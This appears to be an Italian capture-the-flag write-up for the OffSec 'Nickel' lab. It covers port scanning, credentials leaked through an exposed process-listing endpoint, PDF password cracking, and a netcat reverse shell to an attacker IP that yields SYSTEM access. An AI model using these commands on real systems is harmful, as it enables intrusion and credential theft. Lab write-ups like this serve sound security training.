Nickel
Network
- Ip Target :
192.168.154.99
Enumeration
| Port | Service | Version | Notes |
|---|---|---|---|
| 21/tcp | ftp | FileZilla ftpd | FTP |
| 22/tcp | ssh | OpenSSH for_Windows_8.1 | SSH |
| 80/tcp | http | - | |
| 135/tcp | msrpc | Microsoft Windows RPC | MSRPC |
| 139/tcp | netbios-ssn | Microsoft Windows netbios-ssn | SMB |
| 445/tcp | microsoft-ds | - | SMB |
| 3389/tcp | ms-wbt-server | Microsoft Terminal Services | RDP |
| 5040/tcp | unknown | - | |
| 7680/tcp | pando-pub | - | |
| 8089/tcp | unknown | Microsoft HTTPAPI | |
| 33333/tcp | dgi-serv | - |
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.154.99
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 14:28 CET
Nmap scan report for 192.168.154.99
Host is up (0.068s latency).
Not shown: 65428 closed tcp ports (reset), 90 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
7680/tcp open pando-pub
8089/tcp open unknown
33333/tcp open dgi-serv
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 111.68 seconds
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo nmap -Pn -sC -sV -p21,22,80,135,139,445,3389,5040,7680,8089,3333 -oN alltcp.txt 192.168.154.99
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 14:37 CET
Nmap scan report for 192.168.154.99
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_ 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
80/tcp closed http
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3333/tcp closed dec-notes
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2024-08-01T20:35:07
|_Not valid after: 2025-01-31T20:35:07
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2024-12-23T13:39:47+00:00
|_ssl-date: 2024-12-23T13:40:53+00:00; 0s from scanner time.
5040/tcp open unknown
7680/tcp closed pando-pub
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-23T13:39:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.31 seconds
Port 80
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo feroxbuster -u http://192.168.154.99 -w /usr/share/dirb/wordlists/big.txt -t 50
[sudo] password for momphucker:
Sorry, try again.
[sudo] password for momphucker:
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.154.99
🚀 Threads │ 50
📖 Wordlist │ /usr/share/dirb/wordlists/big.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 3w 60c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 4l 7w 97c http://192.168.154.99/
200 GET 0l 0w 0c http://192.168.154.99/Download
200 GET 0l 0w 0c http://192.168.154.99/Log
200 GET 0l 0w 0c http://192.168.154.99/download
200 GET 0l 0w 0c http://192.168.154.99/exit
[####################] - 34s 20469/20469 0s found:5 errors:13197
[####################] - 34s 20469/20469 609/s http://192.168.154.99/
Port 8089
- List Current Deployments:
http://169.254.127.78:33333/list-current-deployments? - List Running Processes:
http://169.254.127.78:33333/list-running-procs? - List Active Nodes:
http://169.254.127.78:33333/list-active-nodes?
Port 33333
Exploit
Gli indirizzi che puntano all'ip 169.254.127.78 sembrerebbero autoassegnatio per problemi di DHCP. Puntando alla porta 33333 viene il dubbio che sia la stessa macchina con ip 192.168.154.99 quindi provo a sostituire l'ip dei puntamenti:
| Namw | Old Path | New Path |
|---|---|---|
| List Current Deployments | http://169.254.127.78:33333/list-current-deployments? | http://192.168.154.99:33333/list-current-deployments? |
| List Running Processes | http://169.254.127.78:33333/list-running-procs? | http://192.168.154.99:33333/list-running-procs? |
| List Active Nodes | http://169.254.127.78:33333/list-active-nodes? | http://192.168.154.99:33333/list-active-nodes? |
Ed effettivamente c'è una risposta:
Chimandolo con un curl ottengo:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl 'http://192.168.154.99:33333/list-active-nodes' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1'
<p>Cannot "GET" /list-active-nodes</p>
Il che indica che non è possibile fare una "GET", quindi provo con una "POST":
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl -X POST 'http://192.168.154.99:33333/list-active-nodes' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>
L'errore suggerisce che è necessario passare anche l'header con una lenght:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl -X POST 'http://192.168.154.99:33333/list-active-nodes' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1' -H 'Content-Length: 0' --verbose
* Trying 192.168.154.99:33333...
* Connected to 192.168.154.99 (192.168.154.99) port 33333
> POST /list-active-nodes HTTP/1.1
> Host: 192.168.154.99:33333
> User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> DNT: 1
> Connection: keep-alive
> Referer: http://192.168.154.99:8089/
> Upgrade-Insecure-Requests: 1
> Sec-GPC: 1
> Content-Length: 0
>
< HTTP/1.1 200 OK
< Content-Length: 22
< Server: Microsoft-HTTPAPI/2.0
< Date: Mon, 23 Dec 2024 14:48:48 GMT
<
* Connection #0 to host 192.168.154.99 left intact
<p>Not Implemented</p>
Sul primo url non ho un risultato soddisfacente, provo sul secondo:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl -X POST 'http://192.168.154.99:33333/list-running-procs' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1' -H 'Content-Length: 0' --verbose
* Trying 192.168.154.99:33333...
* Connected to 192.168.154.99 (192.168.154.99) port 33333
> POST /list-running-procs HTTP/1.1
> Host: 192.168.154.99:33333
> User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> DNT: 1
> Connection: keep-alive
> Referer: http://192.168.154.99:8089/
> Upgrade-Insecure-Requests: 1
> Sec-GPC: 1
> Content-Length: 0
>
< HTTP/1.1 200 OK
< Content-Length: 3650
< Server: Microsoft-HTTPAPI/2.0
< Date: Mon, 23 Dec 2024 14:49:33 GMT
<
[...]
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
[...]
* Connection #0 to host 192.168.154.99 left intact
Ottengo una lista di processi, tra cui quello di una sessione ssh con username ariah e password Tm93aXNlU2xvb3BUaGVvcnkxMzkK. Provo l'accesso in ssh, dato che la porta 22 è aperta, ma con esito negativo. La password sembrerebbe essere codificata in base64 quindi provo a decodificarla:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ hURL -b "Tm93aXNlU2xvb3BUaGVvcnkxMzkK"
Original string :: Tm93aXNlU2xvb3BUaGVvcnkxMzkK
base64 DEcoded string :: NowiseSloopTheory139
Provo ad accedere via ssh con username ariah e password NowiseSloopTheory139:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ ssh -l ariah 192.168.154.99
ariah@192.168.154.99's password:
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah>
Esito positivo!
Recupero la flag local.txt:
Privilege Escalation
Nella cartella FTP è presente un file pdf, Infrastructure.pdf. Lo scarico, ma per aprirlo è necessario inserire una password:
Provo a crackarlo con pdfcrack:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -1060
Length: 128
Encrypted Metadata: True
FileID: 14350d814f7c974db9234e3e719e360b
U: 6aa1a24681b93038947f76796470dbb100000000000000000000000000000000
O: d9363dc61ac080ac4b9dad4f036888567a2d468a6703faf6216af1eb307921b0
Average Speed: 119673.4 w/s. Current Word: '097270613'
Average Speed: 119564.6 w/s. Current Word: 'pass0577'
Average Speed: 119661.3 w/s. Current Word: 'jamz01'
Average Speed: 119240.1 w/s. Current Word: 'blv99f250'
found user-password: 'ariah4168'
Esito positivo, password ariah4168!
Contenuto del pdf:
Il primo link è un command endpoint. Lo testo:
I comandi vengono eseguiti come SYSTEM.
A questo punto apro un listener sulla porta 4455:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
Carico sulla macchina nc.exe dato che non è presente.
ed eseguo una web reverse shell:
nickel/?C:\Users\ariah\Desktop\nc.exe 192.168.45.172 4455 -e cmd
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.172] from (UNKNOWN) [192.168.154.99] 49709
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
